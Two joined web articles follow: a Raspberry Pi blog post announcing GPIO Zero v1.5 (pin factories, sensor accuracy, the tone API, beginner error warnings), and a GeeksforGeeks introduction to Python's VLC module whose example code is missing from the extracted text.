Post Syndicated from Ben Nuttall original! Pin factories – take your pick GPIO Zero started out as a friendly API on top of the RPi.GPIO library, but later we extended it to allow other pin libraries to be used. The pigpio library is supported, and that includes the ability to remotely control GPIO pins over the network, or on a Pi Zero over USB. This also gave us the opportunity to create a “mock” pin factory, so that we could emulate the effect of pin changes without using real Raspberry Pi hardware. This is useful for prototyping without hardware, and for testing. Try it yourself! As well as the pin factories we provide with the library (RPi.GPIO, pigpio, RPIO, and native), it’s also possible to write your own. So far, I’m aware of only one custom pin factory, and that has been written by the AIY team at Google, who created their own pin factory for the pins on the AIY Vision Kit. This means that you can connect devices to these pins, and use GPIO Zero to program them, despite the fact they’re not connected to the Pi’s own pins. If you have lots of experience with RPi.GPIO, you might find this guide on migrating from RPi.GPIO to GPIO Zero handy. Ultrasonic distance sensor We had identified some issues with the results from the DistanceSensor class, and we dealt with them in two ways. Firstly, GPIO Zero co-author Dave Jones did some work under the hood of the pins API to use timing information provided by underlying drivers, so that timing events from pins will be considerably more accurate (see #655). Secondly, Dave found that RPi.GPIO would often miss edges during callbacks, which threw off the timing, so we now drop missed edges and get better accuracy as a result (see #719). The best DistanceSensor results come when using pigpio as your pin factory, so we recommend changing to this if you want more accuracy, especially if you’re using (or deploying to) a Pi 1 or Pi Zero. Connecting devices A really neat feature of GPIO Zero is the ability to connect devices together easily. One way to do this is to use callback functions: button.when_pressed = led.on button.when_released = led.off Another way is to set the source of one device to the values of another device: led.source = button.values In GPIO Zero v1.5, we’ve made connecting devices even easier. You can now use the following method to pair devices together: led.source = button Read more about this declarative style of programming in the source/values page in the docs. There are plenty of great examples of how you can create projects with these simple connections: Testing An important part of software development is automated testing. You write tests to check your code does what you want it to do, especially checking the edge cases. Then you write the code to implement the features you’ve written tests for. Then after every change you make, you run your old tests to make sure nothing got broken. We have tools for automating this (thanks pytest, tox, coverage, and Travis CI). But how do you test a GPIO library? Well, most of the GPIO parts of our test suite use the mock pins interface, so we can test our API works as intended, abstracted from how the pins behave. And while Travis CI only runs tests with mock pins, we also do real testing on Raspberry Pi: there are additional tests that ensure the pins do what they’re supposed to. See the docs chapter on development to learn more about this process, and try it for yourself. pinout You may remember that the last major GPIO Zero release introduced the pinout command line tool. We’ve added some new art for the Pi 3A+ and 3B+: pinout also now supports the -x (or --xyz) option, which opens the website pinout.xyz in your web browser. Zero boilerplate for hardware The goal of all this is to remove obstacles to physical computing, and Rachel Rayns has designed a wonderful board that makes a great companion to GPIO Zero for people who are learning. Available from The Pi Hut, the PLAY board provides croc-clip connectors for four GPIO pins, GND, and 3V3, along with a set of compatible components: Since the board simply breaks out GPIO pins, there’s no special software required. You can use Scratch or Python (or anything else). New contributors This release welcomed seven new contributors to the project, including Claire Pollard from PiBorg and ModMyPi, who provided implementations for TonalBuzzer, PumpkinPi, and the JamHat. We also passed 1000 commits! Watch your tone As part of the work Claire did to add support for the Jam HAT, she created a new class for working with its buzzer, which works by setting the PWM frequency to emit a particular tone. I took what Claire provided and added some maths to it, then Dave created a whole Tones module to provide a musical API. You can play buzzy jingles, or you can build a theremin: GPIO Zero theremin from gpiozero import TonalBuzzer, DistanceSensor buzzer = TonalBuzzer(20) ds = DistanceSensor(14, 26) buzzer.source = ds …or you can make a siren: GPIO Zero TonalBuzzer sine wave from gpiozero import TonalBuzzer from gpiozero.tools import sin_values buzzer = TonalBuzzer(20) buzzer.source = sin_values() The Tones API is a really neat way of creating particular buzzer sounds and chaining them together to make tunes, using a variety of musical notations: >>> from gpiozero.tones import Tone >>> Tone(440.0) >>> Tone(69) >>> Tone('A4') We all make mistakes One of the important things about writing a library to help beginners is knowing when to expect mistakes, and providing help when you can. For example, if a user mistypes an attribute or just gets it wrong – for example, if they type button.pressed = foo instead of button.when_pressed = foo – they wouldn’t usually get an error; it would just set a new attribute. In GPIO Zero, though, we prevent new attributes from being created, so you’d get an error if you tried doing this. We provide an FAQ about this, and explain how to get around it if you really need to. Similarly, it’s common to see people type button.when_pressed = foo() and actually call the function, which isn’t correct, and will usually have the effect of unsetting the callback (as the function returns None). Because this is valid, the user won’t get an error to call their attention to the mistake. In this release, we’ve added a warning that you’ll see if you set a callback to None when it was previously None. Hopefully that will be useful to people who make this mistake, helping them quickly notice and rectify it. Update now Update your Raspberry Pi now to get the latest and greatest GPIO Zero goodness in your (operating) system: sudo apt update sudo apt install python3-gpiozero python-gpiozero Note: it’s currently syncing with the Raspbian repo, so if it’s not available for you yet, it will be soon. What’s next? We have plenty more suggestions to be working on. This year we’ll be working on SPI and I2C interfaces, including I2C expander chips. If you’d like to make more suggestions, or contribute yourself, find us over on GitHub. The post GPIO Zero v1.5 is here! appeared first on Raspberry Pi.
https://noise.getoto.net/author/ben-nuttall/
CC-MAIN-2021-39
en
refinedweb
VLC module in Python – An Introduction The. We can use the VLC media player with the help of python as well, in order to install vlc module in python we will use the command given below pip install python-vlc Note: In order to use the vlc module in python, the user system should have vlc media player already installed on the machine. Importing the VLC Module: To import the VLC module use the following import vlc Fixing error that may occur while importing vlc module 1. If path is not added, the problem is that libvlc.dll is not in the PATH(System Variable). Just add the file libvlc.dll path to system variable, this file can be found in the vlc folder where it is installed 2. Wrong version of VLC, oftenly people download 32bits vlc’s version. This may cause some trouble if we have installed the 64 bits version of python. To fix that, we just need to reinstall the 64 bits vlc’s version. 3. Import os module prior to vlc module and register libvlc.dll using os.add_dll_directory(r’C:\Program Files\VideoLAN\VLC’). Example 1: Playing Video using VLC Python3 Output : Example 2: Here we will derive the duration of a video file using the VLC module. Python3 Output : Duration : 5006 Attention geek! Strengthen your foundations with the Python Programming Foundation Course and learn the basics. To begin with, your interview preparations Enhance your Data Structures concepts with the Python DS Course. And to begin with your Machine Learning Journey, join the Machine Learning – Basic Level Course
https://www.geeksforgeeks.org/vlc-module-in-python-an-introduction/
CC-MAIN-2021-39
en
refinedweb
Last call issues list for xquery (up to message 2004Mar/0246). This document identifies the status of Last Call issues on XQuery 1.0: An XML Query Language as of April 4, 2005. The XQuery 1.0 Language has been defined jointly by the XML Query Working Group and the XSL Working Group (both part of the XML Activity). The April 4,Query]” 415 issue(s). 0 raised (0 substantive), 0 proposed, 415 decided, 0 announced and 0 acknowledged. Section 3.1.5 Function Calls Editorial Please reword: " parameteror " with " parameter or " DECISION: To leave to the editor RESOLVED: qt-2004Jan0029-01 closed, fixed editorially Section 2.1.1 Static Context Editorial "environmentor" => "environment or" DECISION: To leave to the editor RESOLVED: qt-2004Jan0152-01 closed, fixed editorially Consider] Moved to the Data Model cluster. Norm: the only resolution I can propose is, sometimes you lose. Use format-number if you care about precision. Section 3.4.1.1 ends with a paragraph mentioning that pattern facets are not respected during serialization (last paragraph in the section). PC: how do we respond to the Schema WG comment? Norm: we don't know how to address this. If you do this, your documents may not be valid after you manipulate the DM instance. MRys: it's provable that you can't reverse the patterns. RESOLVED: closed, Norm to reply with the "you lose" paraphrase. The Web Serice Description Language (WSDL) [1] provides a facility for describing Web services - a WSDL document could be thought of as an XML description of a set of function signatures. Some XML Query implementations will very likely support the idea of calling such functions in XPath expressions. Would it increase interoperability of such implementations if one could explicitly associate a namespace prefix with a WSDL document in the XML Query Prolog? For example, import service cvt at ""; and then, in the body of the query, one might be able to use cvt:convert("F", "C", 23.6) to convert between temperatures. An alternative to extending the prolog might be to extend access to an implementation's underlying URI resolver, so that users could implement WSDL support in XQuery directly. However, interoperability and integration between specifications is important to the W3C. Liam [1] Web Services Description Language, -- Liam Quin, W3C XML Activity Lead, Status from meeting 201: PENDING. For looking up status of this, note mispelling. Paul suggested doing it using an external module which represents the web service via the module import feature. RESOLUTION: No changes to the document. Respond to the comment that --it can be done with import module or externally defined functions plus a layer of software which we do not need to define. Nothing is needed in the XQuery specification. Mike presented some issues illustrating that it can not be done efficiently which he will take to email. This comment pertains to the 12 November 2003 internal WD of XQuery 1.0: An XML Query Language [1]. Please accept our sincere apologies on being past-due with this submission, which discharges the promise made in [2]. Regards, Henry S. Thompson (on behalf of the XML Schema WG) ------------------------- There is what appears to us an inconsistency between section 3.13 Validate Expressions [1] (repeated in 3.7.1.5 Type of a Constructed Element) in XQuery itself and section 3.3 Construction from a PSVI [2] in the Data Model, based on the interpretation placed on the *validation mode*. The latter says: "The data model supports incompletely validated documents. Elements and attributes that are not valid are treated as having unknown types." The former says: "If the [validity] property of the topmost element information item in this PSVI is not valid, a type error is raised." In concrete terms this means that starting from e.g. a document + schema where the document element is not declared, but one or more of whose descendants are declared, not only can a data model be constructed, but also it will have useful type information for those elements, since they will be [validity]='valid' and "If the [validity] property exists and is "valid", the type of an element or attribute information item is represented by an expanded-QName . . ." In contrast having constructed such a document node in a query context, the result of validating it will either be a type error (if *validation mode* is 'strict' or 'lax') or a tree with uniformly untyped data (if *validation mode* is 'skip'). This change in the interpretation of 'lax' from the one it is defined to have in XML Schema not only will confuse users, it is inconsistent with the way Data Model instances are constructed from PSVIs, and also means that undeclared elements are treated differently if they are at the validation root ('lax' has the new meaning) or internal to it ('lax' means what XML Schema says it means). We would very much hope that the power and flexibilty reflected in the detailed reporting of schema validity assessment outcome be available no only at Data Model construction time, but also via the 'validate' expression, by bringing the treatment of 'lax' as a *validation mode* in to line with XML Schema and Data Model construction. November draft of the XQuery specification (4.7 Module Import) says that "Two modules may import each other." However, the formal semantics assumes this is not the case, starting with: 5.2 Module Declaration ." So you say "let's fix the formal semantics". Doable, probably, but not trivially. The processing of the module prologue is done in "declaration order", and cyclic module imports disallows that. A module cycle has to be compiled as a unit; you can't separately compile them. So they're little more than syntactic sugar. I think you could define module cycles by defining module import as "semi-textually" merging in declarations from the imported module, renaming the namespace prefixes. I don't understand schema imports well enough to know if they would cause complications. Other declarations such as base-uri, validation declaration, and default collation declations probably cause minor complications. Variables declarations are the biggest obvious complication. Note that if a VarDecl omits the TypeDeclaration, the value of the VarRef is that of its definining expression. This doesn't work if there is a cycle between variables, so we'd need to add rules to disallows such a cycle. Note that XQuery static typing is strictly bottom-up; there is no ML-style type unification. A related issue is that the the formal semantics "looks up" variables and functions in imported modules by lookup up their namespace uri in the "module_dynEnv". Note this doesn't work if there are multiple modules in the same namespace. Both formal and informal semantics are very unclear about the difference between a library module as a syntactic unit, its namespace, and the result of elaborating one or more libray module syntax forms with the same uri. If there may be multiple modules for the same uri, how do you tell when there is a cycle? What if there is no location hint in the module import, or the location hint is an alias (e.g. a symbolic link) for a previously-imported module? Separate compilation becomes a lot more complicated, both definition and implementation, when modules may recursively import each other. Find a pre-compiled module is difficult unless there is a one-to-one mapping between modules and URIs. Location hints don't help much unless their meaning is standardized, at least in a non-normative manner. If two queries are executed, and both import the same library module, must/should the implementation evaluate the library module's variable initializations twice, or can it re-use the values from the first query? It is tempting to think of module-leval variables similar to C/C++/Java static variables that are initialized when their module is first loaded, but that may not be the desired semantics. Consider: declare variable $var { fn:current-time() }; I'm sure these issuees can be solved, but it will take time; better to leave them for version 2.0. Recommendation for XQuery 1.0: * Modules may not import each other, directly or indirectly. * Only allow a single library module for a given namespace. * Consider a non-normative recommendation that location specifiers in import statements be URIs (where relative URIs are resolved against the importing module's base uri, while defaults to its "source file name"). * Possibly: Remove the requirement that the fn:current-date, fn:current-time, and fn:current-dateTime functions if "invoked multiple times during the execution of a query or transformation, these functions always return the same result", since that would preclude an implementation from running library initializers only once. Alternative, recommended to be deferred to 2.0: * Allow modules to import each other, but prohibit static cycles in definition of variables. I.e. a variable's defining expression may not depend on variables or functions that in turn depend on it. This restriction should be statically checkable; this avoids the need for a dynamic check, and it solves the problem of determining the type of a variable without a type specifier. Note that a dynamic check for a cyclic dependency isn't enough if you're doing static typing. (I suggest allowing implementations without the static typing feature to defer the cycle check until runtime.) * We have to define both informally and formally the semantics of a cycle of module imports. This is difficult. * We have to be able to detect a module cycle. This means we have to have a concept of "module identity" or "module name". This is difficult if multiple modules may have the same namespace. * Remove the restriction that a variable must be defined before its use, as that is redundant, and the restriction is meaningless if you have modules that import from each other. -- --Per Bothner per@bothner.com ++ Jerome: Cyclic imports are hard to specify formally, and we should drop them in V1. ++ Jonathan: Agrees with Jerome. ++ DC: How exactly is cyclic import defined? ++ Jerome: The graph of modules importing other modules must not contain any closed cycles. We should not allow Module A to import Module B and Module B to import Module A. ++ Mike Carey: What is the problem with this? ++ Jerome: Interferes with separate compilation. We don't know where to start the compilation process. ++ Liam: Does anyone object to ruling out cyclic import in Version 1? ++ Mike Carey: Yes, I'm concerned that if we rule this out for V1, we may somehow preclude introducing it in a later version. ++ Jonathan: But if cyclic import is an error in V1, relaxing this error in a later version would be a compatible change. ++ RESOLUTION: ++ Liam: I hear no objections other than from Mike Carey. I rule that Per Bothner's issue 2004Mar0013-01 is closed by accepting a restriction against cyclic modules in V1. Jerome will provide a proposed wording and Don will include it in the language document with editorial discretion. Jerome will reflect this decision in the Formal Semantics document. Mike Carey is encouraged to raise a separate issue if he discovers some way in which we are placing a limitation on Vnext. Closing this issue completes Action A-STATA-18. In XPath/XQuery Section 3.1.5, Function Calls, under "Function Conversion Rules", after atomization, we find the following rule: "Each item in the atomic sequence that is of type xdt:untypedAtomic is cast to the expected atomic type." This is not completely specified for certain built-in functions such as fn:abs() in which the expected parameter type is "numeric", which includes integer, decimal, float, and double. To complete the specification, we should insert the following sentence after the rule cited above: "For parameters of built-in functions where the expected type is specified as numeric, arguments of type xdt:untypedAtomic are cast to xs:double." --Don Chamberlin DECISION: qt-2004Feb1207-01 has been accepted by a previous decision and already implemented in the July 2004 draft.8 Section 3.13 Validate Expressions Validate expressions are defined in terms of serialization [3.13]. There are problems with interposing serialization between the data model and validation, however, and we suggest you return to using a mapping from the data model to the infoset and defining validation on that instead. Section [2.2.4] apparently relieves implementations of the necessity of supporting a serialization interface, but [3.13] requires it through the back door, and through a mechanism that does not provide the means to provide the serialization process with the normal serialization parameters. Serialization depends on casting to xs:string which in turn is defined in terms of the various type annotations on the data model. There is a certain apparent circularity here that is confusing, if nothing else. Interposing a serialization step means that validating a data model that already has type annotations may cause the validation outcome to be different, because the serialization rules are different, and some types are not necessarily serializable. In particular, serialization will fail for QName nodes with no bound prefix [ section 2]. There may also be edge cases involving simple derived types (in the schema being used for validation) with pattern restrictions that rule out certain of the serializations used for data already annotated with a certain types that would also lead to problems that would not have otherwise arisen. We suggest decoupling validate from serialization, and instead providing a mapping from the data model to the infoset and using that as the basis of validation. Providing such a mapping will help those who will inevitably have to create their own mappings, and to some extent mitigate the introduction of yet another data model. Moved to the Data Model cluster.6 Section 4.8 Variable Declaration The notion 'circular definitions' or 'circularity' is not well defined in the spec. The following wording provides a kind of definition: If an initializing expression cannot be evaluated because of a circularity (for example, it depends on a function that in turn depends on the value of the variable that is being initialized), a dynamic error is raised.[err:XQ0054]" It's not quite clear how circularity between modules is determined. For example, will the variable initialization be successful in case of such modules: module namespace math = ""; import module namespace math2 = ""; declare variable $x as xs:integer {$math2:z}; module namespace math2 = ""; import module namespace math = ""; declare variable $y as xs:integer {$math:x}; declare variable $z as xs:integer {1}; Jonathan will reply to Schema. Related issue: 2004Feb0791-01 This was closed at the MIT face to face.5 Section 3.12.3 Cast Needs to define a rule for determining static type of a cast expression. The type specified after the "as" word is expected to be the static type similar to the definition in "3.12.6 Treat" but the 3.12.3 section lacks such definition. RESOLVED: reject this comment. Jerome to reply that we will not make this change because the static type of an expression is defined in the Formal Semantics docuement, and cast is based on the dynamic4 Section 3.12.2 Typeswitch. There are no SequenceType components in the default clause according to the Grammar, so perhaps static type for variable should be defined in another way. Don: A typeswitch is equivalent to a stack of if-then-elses with treat in the then clauses. I think the commenter is correct that the case clauses have sequencetype, and the default clause does not. We should fix this. Jerome: The static type of the variable in the default clause is the same as the static type of the expression. Don suggests that we add that sentence to our document. RESOLVED: accept this comment, adding the sentence "The static type of the variable in the default clause is the same as the static type of the expression." Don to respond accordingly.2 Section 3.4 Arithmetic expressions The unary arithmetic operations are defined as: [65] UnaryExpr ::= ("-" | "+")* UnionExpr Allowing multiple unary operations to be concatenated together is different than normal practice in most other languages. A rationale or clarification would be welcomed here. See [432] [---+-+1, multiple unary operators before an expression, there for backward compatibility, group previously didn't want to change it] ACTION A-SJ04-27: Don will add a note to the XPath document to explain the rationale Range expressions (op:to) should treat empty sequence arguments in same way as other binary operators: if one of argument is empty sequence, result is empty sequence. I don't see reason for making exception for range expressions. Best Regards, Noe Michejda 7th Portal S.C. + DC: The current rule is consistent with the function conversion rules for integer. This is nice and simple. ++ M.Rys: Allowing empty sequences as operands of "to" would avoid static errors in some cases. ++ M.Kay: TO is unlike other binary operators because it takes singleton inputs and returns a sequence output. ++ Andrew: Advocates accepting the empty sequence in order to avoid error cases. ++ DECISION: Accepted last call comment qt-2004Feb/1141, subject to approval by XSL WG since it affects XPath. "TO" operator will accept empty sequences. ++Note from Chair: This decision was subsequently confirmed by the XSL WG. See: ++ DC: Accepting this comment requires: In section 3.3.1, under "range expression": Change the "expected parameter type" from "xs:integer" to "xs:integer?". Delete the following sentence. In the next sentence, insert "or if either operand is an empty sequence". No change is needed to operator mapping table or F&O. Current syntax of SequenceType gives user no control over allowing substitutions of element or not. User can't test for local element name if there is global declaration with same name without allowing of elements from substitution group of global element. Or element will be matched agains unanticipated type from global declaration, where user wanted only name test. And there will be no warning from processor. If schema is authored by another person than stylesheet or query this can lead to disaster if at some point declaration will be added without knowledge of stylesheet author. Using of declarations and substitution groups should be explicit. I propose following changes in syntax of elementTest to something like this: element() : matches any element element(*,type) : matches type if element type is 'type' or is derived from it element(qname ["decl" | "subst"] [,type] ["nillable"]) if "decl" is present, element is matched to global element declaration if "subst" is present, element is matched to global element declaration allowing substitutions if neither "decl" or "subst" is present element name is matched to 'qname' additionally if 'type' is present, element type must be derived from 'type' element(SchemaContextPath qname) element is matched to local element declaration same applies to attribute() [without 'subst'] This will remove synonyms: element() = element(*) = element(*,*) attribute() = attribute(*) = attribute(*,*) Another (maybe better to read) notation: element(decl(qname),type) element(subst(qname),type) or element(substitutions(qname),type) element(substitution(qname),type) attribute(decl(qname)) etc. Best Regards, Noe Michejda 7th Portal S.C. RESOLVED by current SequenceType syntax (reflected in July WD) ACTION: Jonathan to respond. SECTION 2.6: Optional Features Today XQuery requires node identities to be preserved in the language quite strongly. All nodes that are from an external source or created in the language require node identities to be preserved. This is a strict requirement that is not necessary for a large number of applications that need to deal only with the values contained in the nodes rather than the nodes' identity. This is also a great burden for implementations that can otherwise use streaming mechanisms for XML processing. This is also a problem for implementations that choose to push down the query to be evaluated in native systems like relational databases or other non-XML value based systems. Suggestion: Include a static context flag that specifies whether node identities need to be preserved. If the option is true, then no node based operations such as "is", "<<" , ">>" etc.. should be allowed. Further this could also restrict non-forward axes like parent(), sibling(), root(), etc.. - Steve B. MR sees proposal as requesting a single option in language that makes any expression that returns node, preserving node identity etc, would return copy of that node, with only subtree starting at that node, so every step in XPath expression would return new node rather than original. If duplicate elimination happens after that, nothing will ever get eliminated. See the use cases for this, but very reluctant to add it at this point. Think current proposal mixes ability to copy with ability to cut off the parent axis. Would prefer to handle that at the conformance level rather than munging data model. JR don't think it makes any sense to consider just what we are looking at on its own. If Oracle wants to present a complete proposal on what to change, we could consider it, but this isn't baked enough. SB: There is a more detailed proposal in the works. Would WG be interested in looking at it? Chair asks for sense of whether WG would be interested in a detailed proposal. Several members express unwillingness to consider such a magnitude change at this point. JM: Do we think this is something a vendor could add as a vendor extension and we could retrofit in a v-next? A: Sure. JM: We accept the WG's unwillingness but expect others will see this need and invite them to work with us on this, perhaps as a prelude v-next. RESOLVED: closed ORA-XQ-408-B with no action Dissent: Oracle SECTION 4.3: Base URI Does specifying the baseuri in a module only take effect for lexically defined URIs or does it also apply to any URI values present in the system? In particular does the xml:base property affect resolution of URLs inside a document? * When we convert an anyURI value from an element or an attribute to a string using the resolve-uri() function, does it take into account the xml:base property? e.g. consider a purchaseorder document with an xml:base property defined as "" and has an "attachment" element that is of the anyURI type. Now given a query like, declare {doc("boo")} </A> Does the URL "boo" inside doc() resolve as or ? - Steve B. Don identified text in the XQuery language spec, section 4.5. Andrew pointed us to section 15.5.4, fn:doc(), in the F&O spec. Between the two, the meeting concluded that the base URI declared in the module prolog is used to resolve relative URIs and that the resolution is not affected by the xml:base attributes of instance documents accessed by the query or by an xml:base attribute in an element being constructed. The specific answers to the two questions in the comment are, respectively, "yes" and "moo". RESOLUTION: Comment qt-2004Feb1110-01/ORA-XQ-011 is resolved with no changes to the document. Note to F&O editors: In F&O, section 15.5.4, fn:doc(), the Note terminates with the phrase "to this function", which could better be phrased "to the fn:doc function" to avoid confusion. SECTION 3.8: FLWR Expressions Currently, the tuple is defined for the FLWR and order by clauses as containing a set of bound variables. It might help to formalize the tuple notion so that a lot of trivial operations that are possible in languages like SQL (and quite cumbersome to do in XQuery) can be made easy. Example: i) If we map any external related set of values (example an SQL row or an XML file in a file system along with some metadata like author etc..) into XQuery, since there is no notion of a tuple, we have to wrap the XML values in another XML element. This causes issues, since node identities, document boundaries etc.. are lost. ii) When returning values as well, without the notion of tuples, related values either have to be enclosed in an XML element or streamed as siblings in the sequence. This also leads to the same problems as (i). Example - I want to return a Resume XML document and a computed score for the resume. Either we have to return a sequence that has the resume document followed by it's score or create a new XML element and stuff the two in there - the latter will lose the resume document's node identity and typing. ii) Performing duplicate elimination is quite a challenge without tuples. (See G.5) iii) Performing grouping operations is also hard. Suggestion: Formalize the tuple as something in between an item and a sequence - A sequence consists of tuples which consists of items. Or maybe introduce a notion of a tuple-sequence as different from a regular sequence. - Steve B. Is this related to sequences of sequences issue discussed at last f2f? A: Yes. RESOLVED: closed ORA-XQ-408-B with no action Dissent: Oracle SECTION C.1: Static Context Components The dynamic context today includes the context item. However, the static context does not include a static type for the context item. This must be included for doing reasonable static type checking. The table in C.1 - Static Context components could include the following item - Component: Context item - Predefined value: none Overwritable by implementation: Overwritable and Augmentable Overwritable by query: -- ?? Scope - Global Consistency rules - Only one context item from the outside environment - Steve B. Minutes log just says "This issue is closed" (joint issue) [[accepted]] SECTION G.5: Selecting distinct combinations Today, the distinct-values takes a single sequence as input and returns a sequence of distinct values. This makes it quite cumbersome to perform distinct values across a tuple. It is trivial in SQL for example to perform a distinct across values - select DISTINCT price, orderno, date from table; With XQuery, one has to get distinct prices, ordernos and dates and then somehow combine them back with the original node. This is both cumbersome and harder to optimize in a general query. Suggestions: i) If we have a sequence of tuples or sequence of sequences, then distinct values can take in a sequence of tuples/sequence of sequences and return a sequence containing distinct values. ii) Or - Add a DISTINCT clause that prunes out nodes that have the same value. Example - the query in G.5 with a distinct clause - for $p in . distinct-values on $p//product, $p//size, $p//color return <option> <product>{$p//product}</product> <size>{$s//size}</size> <color>{$c//color}</color> </option> The clause can remove nodes that have the same value for product, size and color and return some $p that has a distinct set of values. - Steve B. RESOLVED: closed ORA-XQ-407-B with no action Rationale: no new features and this will be subsumed by group-by which we have already agreed to take up in the future Dear XQuery Formal semantic editor: I have some question about XQuery/Xpath core grammar in "XQuery 1.0 and XPath 2.0 Formal Semantics" (2003-11-12). 1)Some Non-Terminal only occur in the left side of core grammar production,but no Non-Terminal can yield it. For example: PrimaryExpr OrderByClause QuantifiedExpr could you explain it in detail? 2)In Formal semantic,OrderByClause can be normalized to nested let and for expressions,but why it still remain in the core grammar? 3) In XQuery standard grammar: ExprSingle ::= FLWORExpr | QuantifiedExpr | TypeswitchExpr | IfExpr | OrExpr In XQuery Core grammar: ExprSingle ::= FLWORExpr | TypeswitchExpr | IfExpr | OrExpr QuantifiedExpr has been removed ,why? best regards liao wei This should probably be moved to Formal Semantics comments. Looks like some bugs. This is a follow-on to the thread "recursive imporged [sic] variable declarations": From that I gather that the WG is in favor of dynamic/lazy initialization of variable declarations, allowing code like: M1: define variable $x external; define variable $y { if ($x) then $M2:z else 0 }; M2: define variable $z { $M1:y }; That implies that variable initialization is executed in an order as needed dynamically. The natural implementation model is to lazily initialize each variable on its first reference. E.g. $y translates to (using Java syntax): private int initialized$y = UNINITIALIZED; private Object value$y; public Object get$x() { if (initialized$y == INITIALIZING) throw new Error("cycle initializing $y"); if (initialized$y == UNINITIALIZED) { initialized$y = INITIALIZING; value$y = get$x() ? M2.get$z() : 0; initialized$y = INITIALIZED; } return value$y; } However, 4.8 Variable Declaration in the November XQuery draft says: "Initializing expressions are evaluated at the beginning of the dynamic evaluation phase." This means the initialization has to be done "semi-eagery": all the initializing expressions have to be evaluated before the query expression is evaluated. But which declarations in which modules. There are the options I see: (1) All declarations in all modules that the implementation knows about are initialized before evaluating the query body. This is of course ridiculous. (2) All declarations in the main module are initialized eagerly (before evaluating the query body); other declarations are initialized on first reference. (3) All declarations in the transitive closure of the main module and imported library modules are initialized eagerly in some unspecified order. (4) All declarations are initialized lazily on first reference; no declarations are initialized before evaluating the query body. I think (4) makes most sense, because (a) it is simplest, assuming we're going to require at-need initialization to handle cycles; (b) both (2) and (3) have an arbitrary feel to them; (c) there may be usecases where it may be useful to not initialize a variable if it is not needed. I can't provide examples, but Michael Key says that requiring dynamic resolution of initialization "might not disallow some useful constructs that appear to have a cycle, but are unproblematic if handled dynamically." His statement was in reference to initialzaing ordering, which isn't quite the same as whether a variable must be initialized at all. However, intuitively it seems to me that the latter is tied to the former. -- --Per Bothner per@bothner.com Public response needed: we're proposing to change this text to make it clear that Per's option (4) is permitted. New text proposed by Don: The initializing expression for a given variable must be evaluated before the evaluation of any expression that references the variable. ACTION: A-STATA-19: Liam will respond. (done) Section). RESOLVED by July WD changes. [130] TypeName ::= QName This does not allow wildcards. SECTION 2.2: Processing Model Figure 1 'Processing Model Overview' makes no mention of modules. They are presumably part of the "XQuery" box (as opposed to inputs to the query processing system). Can this be clarified in the picture? - Steve B. editorial. Michael Rys will alter the diagram, following suggestions JM will supply. SECTION 2.1.2: Dynamic context It says that the type of the implicit timezone in the dynamic context is xdt:dayTimeDuration. However, appendix C.2 says that this component is merely "overwriteable" as opposed to the current date and time, which are "must be initialized by implementation". F&O section 16.7 "fn:implicit-timezone" says that fn:implicit-timezone() returns type "xdt:dayTimeDuration?", which appears to be the correct type of the implicit timezone (ie, with a "?" quantifier). - Steve B. ++ RESOLUTION: The language document now states, in Appendix C, that implicit timezone must be initialized by the implementation. This comment is closed (overtaken by events). ++ Steve Buxton is asked to send a message to the joint list pointing out that in F&O, fn:current-dateTime() cannot return an empty sequence but fn:implicit-timezone() can return an empty sequence. The return types of these functions are inconsistent. XQuery says that the implementation MUST initialize these context items, but XPath does not state this requirement. Should XPath require the current dateTime and implicit timezone to be initialized? SECTION A.2.2: lexical rules The action pushState is used inconsistently in the transitions, sometimes with an argument and sometimes without. The only guidance to the reader is the sentence "In some cases, a transition will 'push' the current state or a specific state onto an abstract stack...". The reader is left to surmise that pushState() means "push the current state" whereas pushState with an argument means "push the argument state". But if we look at the table for OPERATOR state, first row, we see the pair of actions: DEFAULT pushState(DEFAULT) This seems to mean: first, change the current state to DEFAULT, and then push the state DEFAULT on the stack. In that case, couldn't you just write the second action as pushState()? If we look at the next to the last line in the same table, we see EXT_KEY pushState() which seemingly means, change the current state to EXT_KEY, and then push that state. This leaves this reader confused, why in one case you chose to push the state explicitly, and in the other case you did not? I toyed with the possibility that the latter example is to be interpreted "change the current state to EXT_KEY, but push the former state on the stack." But if that is your intention, wouldn't it be better to write it pushState() EXT_KEY ? (Actually, there is considerable evidence in other rules that this is indeed your meaning; I am filing a separate comment asking you to please list the actions in the order of execution instead of this confusing reverse order of execution.) The best solution in my opinion is simply to get rid of the argumentless pushState -- always write out explicitly what state you want to push. That also eliminates the issue of order of execution. - Steve B. Proposal accepted. According to table C2, the context item, context position, and context size are all overwriteable by the implementation. The context position "Must be consistent with context item and context size", and the context size "Must be consistent with context item". I think we should clearly say that if there is no context item, the context position and context size are undefined. It is not reasonable to have no context item but set the context position to 42 and the context size to 43. I think we should clearly say that if there is a context item, the context position and context size are 1. It is not meaningful to say that the single context item is in position 42 of some sequence to which the query has no access. (Obviously, the context item might have a position in a child sequence to which the query has access). Jonathan Andrew: from an XSLT point of view, if I'm iterating through nodes, XSLT will make some item the current item, do I have access to the position and size? Jonathan: I think that's a different issue; the table C2 is different between XSLT and XQuery, but XSL felt this was XQuery-only Jerome: if you're binding from an API you might get your context item coming from a collection from a previous query, e.g. fom XQJ Jonathan's comment: "I think we should clearly say that if there is no context item, the context position and context size are undefined." RESOLVED: agreed to state this in the document. The comment continues: "I think we should clearly say that if there is a context item, the context position and context size are 1" Jerome was unhappy with this, in case the implementation wants to make them something other than position and size 1. Example, your Java program calls an XQuery implementation and gets some results, and then wants to do more processing on each of those results. Insights: Jonathan was thinking that the root level context item constrained the entire query, so you could never go above it, but in Jerome's scenario one indeed might do so. Andrew: if the context item is provided then a position and size must be provided where position > 0 and <= size and the size must be greater than zero. Paul: this replaces the text The context position "Must be consistent with context item and context size", and the context size "Must be consistent with context item". Andrew's definition replaces these, along with the above resolution for if there is no initial context item. RESOLVED: adopted, Don to make these clarifications Jonathan: this should be clarified further to mention it's about the initial context item, size and position. Only the initial values are overwriteable, so C2 should indicate this. RESOLVED: agreed. RESOLVED: qt-2004Feb0166-01 closed Query Lang [4.12] local: "The declared function name in a function declaration must be a QName with a non-empty namespace prefix. If the namespace prefix of a declared function name is empty, a static error is raised.[err:XQ0045]" and "It is a static error if the declared name in a function declaration uses one of the predefined namespace prefixes other than local.[err:XQ0045]" What is the rationale for this restriction on the function _prefix_? Is there a defined mapping from the prefix "local" in the QName "local:myFcn" to a URI? If so, what is it? If there is no such mapping, this seems at odds with recommendations of the web architecture [1]. A constraint on the specific prefix seems very unsound architecturally. Why not permit functions in the main module to have no namespace? Why not permit functions in the main module to use the default function namespace (and its associated prefix)? Suggest: * Strike the second constraint entirely, and remove the special-casing for the prefix 'local'. * Either: Strike the first constraint entirely. or Recast in terms of 